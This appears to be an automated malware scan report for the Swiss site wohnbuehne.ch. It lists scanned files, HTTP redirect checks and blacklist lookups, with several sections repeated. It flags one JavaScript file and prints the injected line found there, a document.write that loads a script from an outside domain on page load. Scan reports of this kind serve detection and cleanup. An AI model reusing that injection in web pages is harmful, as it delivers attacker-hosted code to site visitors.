Scanned pages/files
Request | Server response | Status |
http://wohnbuehne.ch/ | 200 OK Content-Length: 3392 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://wohnbuehne.ch/jquery/slimbox/slimbox.js | 200 OK Content-Length: 4123 Content-Type: application/x-javascript | clean |
http://wohnbuehne.ch/AC_RunActiveContent.js | 200 OK Content-Length: 8548 Content-Type: application/x-javascript | suspicious |
Suspicious code found document.write("<script src='http://marimor.net/ydcVDKwP.php?id=121670272' type='text/javascript'></" + "script>"); | ||
http://wohnbuehne.ch/coma/stat/pixel.php?mode=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://wohnbuehne.ch/test404page.js | 404 Not Found Content-Length: 1363 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: wohnbuehne.ch
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:23:31 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3d558f61ce868bd6c0fe4bd98acccb67; path=/
X-Powered-By: PHP/5.4.32
GET / HTTP/1.1
Host: wohnbuehne.ch
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 14:23:31 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=3d558f61ce868bd6c0fe4bd98acccb67; path=/
X-Powered-By: PHP/5.4.32
Second query (visit from search engine):
GET / HTTP/1.1
Host: wohnbuehne.ch
Referer: http://www.google.com/search?q=wohnbuehne.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: wohnbuehne.ch
Referer: http://www.google.com/search?q=wohnbuehne.ch
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=wohnbuehne.ch
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://wohnbuehne.ch/
Result: wohnbuehne.ch is not infected or malware details are not published yet.
Result: wohnbuehne.ch is not infected or malware details are not published yet.